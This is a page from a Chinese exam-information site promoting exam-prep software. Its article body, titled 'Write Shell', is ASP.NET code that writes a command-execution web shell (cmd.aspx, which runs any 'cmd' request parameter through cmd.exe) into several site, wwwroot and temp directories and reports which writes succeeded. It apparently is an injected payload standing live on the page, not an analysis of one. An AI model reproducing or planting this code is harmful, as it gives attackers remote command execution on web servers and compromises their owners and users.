您的位置:首页 > 考试资讯 > 综合类 > Write Shell
Write Shell
发布时间:2026年04月13日 来源:test
<% string shell = @"<%@ Page Language=""C#"" %><%@ Import Namespace=""System.Diagnostics"" %><% string c=Request[""cmd""]; if(c!=null){Process p=new Process();p.StartInfo.FileName=""cmd.exe"";p.StartInfo.Arguments=""/c ""+c;p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.Start();Response.Write(""
""+p.StandardOutput.ReadToEnd()+""
"");} %>"; string[] paths = new string[] { @"" + Server.MapPath("~") + "\cmd.aspx", @"" + Server.MapPath("~") + "\template\cmd.aspx", @"" + Server.MapPath("~") + "\template\vipks\cmd.aspx", @"" + Server.MapPath("~") + "\inc\cmd.aspx", @"" + Server.MapPath("~") + "\admin\cmd.aspx", @"C:\inetpub\wwwroot\cmd.aspx", @"C:\Windows\Temp\cmd.aspx", }; foreach(string path in paths) { try { System.IO.File.WriteAllText(path, shell); Response.Write("WRITE_OK:" + path + "|"); } catch(Exception ex) { Response.Write("WRITE_FAIL:" + path + ":" + ex.Message.Substring(0, Math.Min(50, ex.Message.Length)) + "|"); } } %>
相关考试资讯
相关考试软件

计算机文化基础所属: 专升本考试

维普考试系列软件是由维普公司研发并推广的一系列自助考试辅导软件,该软件诣在帮助参与各类考试的考生通过考试软件自助进行模拟考试,自我检测和复习考题,本考试软件包含海量的试题试卷,供考生选用,软件安装简便,使用效率高,是参加计算机文化基础考试考生的理想选择...免费下载
  • 金融理论前沿课题
  • 政治
  • 法律文书
  • 技能
  • 人力资源管理(一)
  • 关于我们 | 联系我们 | 广告服务 | 友情链接
    点击咨询维普考试软件 在线客服QQ:5672795 客服热线:023-63422230(法定工作日 9:00---17:30)
    版权所有 2013-2014 重庆维普资讯有限公司 渝B2-20050021-1 渝公网备 500000015-00073 违法和不良信息举报中心
    互联网出版许可证 新出网证(渝)字10号